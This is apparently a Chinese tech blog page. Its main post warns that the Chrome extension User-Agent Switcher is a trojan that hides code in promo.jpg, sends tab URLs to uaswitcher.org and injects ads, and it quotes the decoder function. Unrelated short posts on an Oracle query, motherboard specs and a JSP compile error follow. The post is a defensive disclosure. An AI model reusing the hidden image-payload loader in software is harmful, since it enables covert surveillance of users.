2018年11月

Chrome插件User-Agent Switcher为木马程序,请尽快卸载

User-Agent Switcher for Google Chrome
提供方:useragentswitcher.org
此为插件里面包含恶意代码。
useragentswitcher.org提供的插件都不要下载。很是怀疑!

今天打开京东jd.com自动跳转到一些莫名其妙的网站。他会记录你的访问记录并发送到他的服务器(https://uaswitcher.org/logic/page/data)。chrome商店里面从2017年就有人举报此插件有毒。现在2018年年末的Chrome官方还提供下载。可见官方审核并不严格且效率低下。

恶意程序,访问京东jd.com会定时进行跳转 http://rtbs24.com/?target=https%3A%2F%2Fytthn.com%2Fclick-IQL4686A-HFDQCIIE%3Fbt%3D25%26tl%3D1%26sa%3D116%26url%3Dhttps%3A%2F%2Fwww.jd.com%2F,真心垃圾

大家不要用了,这个扩展含有木马。

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里。

然后 background.js 的第 80 行,从 promo.jpg 图片里解密出恶意代码并执行。

包含的行为包括:

会把你打开的每个 tab 的 url 等信息加密发送到 uaswitcher.org/logic/page/data

另外还会从 api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码。

详情讨论见:www.v2ex.com/t/389340

chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里
background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {
            if ("" === '../promo.jpg') return "";
            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");
            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];
            if (c.data.every(function(t) {
                    return 0 === t
                })) return "";
            var m, s;
            if (1 === o)
                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;
            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }

会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

这里也有人讨论这个问题 https://news.ycombinator.com/item?id=14889619

Chrome插件User–Agent Switcher恶意代码分析报告

User-Agent Switcher for Google Chrome Virus

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

Oralce 按时间区间作为筛选条件查询数据

select reply.assign_investigator1,reply.assign_investigator1_tel,reply.assign_investigator2,reply.assign_investigator2_tel,
assign.case_id
from CASE_T_ASSIGN_REPLY reply
left join case_t_assign assign on assign.assign_id = reply.assign_id
where
create_time between to_date('2018-11-21 00:00:21','yyyy-mm-dd hh24:mi:ss') and to_date('2018-11-21 17:40:21','yyyy-mm-dd hh24:mi:ss')
and assign_investigator1 is not null

戴尔Studio 560s G43T-DM1主板规格

戴尔Inspiron 560 服务标签: 1Y2BW2X 快速服务代码: 4236546345 Intel X4500 HD
主板,G43T-DM1 18D1Y G43+ICH10R
芯片组:INTEL G43
内存:4条 DDR3内存槽
775针 DDR3 775架构酷睿单核,酷睿2双核,酷睿2四核 Intel Core2 Quad Q9550 (130¥,排名850)
ECS G43T-DM1 G43 Motherboard. ECS meets the current and future demands of high performance, power embedded computing, making it ideal for communications, transaction terminal, interactive client, industrial automation applications as well as for standard home use.

Manufacturer: ECS ,台湾精英代工
Part Number: G43T-DM1 18DY1 018DY1 CN018DY1 CN-018DY1

Specifications:

Socket 775 architecture
mATX form factor
Intel G43 / ICH10 chipset
4 x 240-pin DDR3 DIMM slots
Supports up to 8 GB DDR3 dual channel memory (1066 MHz)
Integrated Intel Graphics Media Accelerator X4500 with up to 1759 MB dynamic video memory
Integrated Realtek ALC 888S 8-channel HD audio
Integrated Atheros AR8121-L1E Gigabit Ethernet LAN
4 x Serial ATA 3.0 Gb/s ports
24-pin ATX power connector
4-pin ATX12V power connector
Lead-free components (RoHS compliant)

Expansion Slots:

1 x PCI Express x 16 slot
2 x PCI Express x 1 slots
1 x PCI slot

I/O Ports:

1 x VGA port
1 x HDMI out
4 x USB 2.0 ports
1 x RJ-45 GbLAN
Line in, line out, microphone audio
Side, rear, c/sub audio

Internal Headers:

1 x SPDIF header
1 x front panel header
1 x front panel audio header
1 x CD-In
1 x 9-pin Serial/COM header
3 x USB 2.0 headers (six ports total)

Supported Processors:

Socket 775
1333/1066/800 MHz FSB speeds
Intel Core 2 Quad
Intel Core 2 Duo
Intel Pentium Dual-Core
Intel Celeron Dual-Core
Intel Celeron 4xx-series

Resource specification not allowed here for source level below 1.7

An error occurred at line: 34 in the jsp file: /pages/hbt/hjxf/ajaxYubei.jsp
Resource specification not allowed here for source level below 1.7
31:     String FlowId = request.getParameter("flowid");
32:     //读取json 
33:     StringBuilder sb = new StringBuilder();
34:     try (BufferedReader reader = request.getReader())   
35:         char[] buff = new char[1024];
36:         int len;
37:         while ((len = reader.read(buff)) != -1) {

34行报错,此问题是因为try里面加语句的写法在source level 1.7及其以下的版本是不支持的。把try()括号里面的语句写到下面即可。